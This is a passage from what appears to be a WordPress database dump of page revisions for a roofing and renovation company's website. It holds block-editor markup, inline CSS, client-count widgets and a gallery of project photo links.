.block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"719d3f20-fd00-4b93-8eb7-4c264d4c712b\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"fd8fadce-8cee-456b-9c07-93381eebd5b2\"} -->\n<style type=\"text/css\"> .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fd8fadce-8cee-456b-9c07-93381eebd5b2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"92918f7a-2108-4235-a165-692ee41bca12\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Recent Work','','inherit','closed','closed','','166-autosave-v1','','','2022-08-24 17:38:14','2022-08-24 17:38:14','',166,'https://cteisys.com/?p=477',0,'revision','',0),(452,1,'2022-08-23 18:47:30','2022-08-23 18:47:30','<!-- wp:paragraph -->\n<p>We take pride in our work. Let us show you. Contact us today (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\" alt=\"\" class=\"wp-image-450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\" alt=\"\" class=\"wp-image-449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\" alt=\"\" class=\"wp-image-447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg\" alt=\"\" class=\"wp-image-446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\" alt=\"\" class=\"wp-image-444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" class=\"wp-image-413\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":414,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" class=\"wp-image-414\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\" alt=\"\" class=\"wp-image-438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" class=\"wp-image-440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\" alt=\"\" class=\"wp-image-441\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"e6bf0ffa-3eaa-4534-b455-9beecc921917\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-e6bf0ffa-3eaa-4534-b455-9beecc921917 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-e6bf0ffa-3eaa-4534-b455-9beecc921917 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e6bf0ffa-3eaa-4534-b455-9beecc921917.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"a04abd1a-807e-4d54-ad26-1bbc32a197ae\"} -->\n<style type=\"text/css\"> .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a04abd1a-807e-4d54-ad26-1bbc32a197ae .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a04abd1a-807e-4d54-ad26-1bbc32a197ae skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"5a8ddce2-df06-41fe-9ad7-cb94cdf697aa\"} -->\n<style type=\"text/css\"> .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a8ddce2-df06-41fe-9ad7-cb94cdf697aa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block 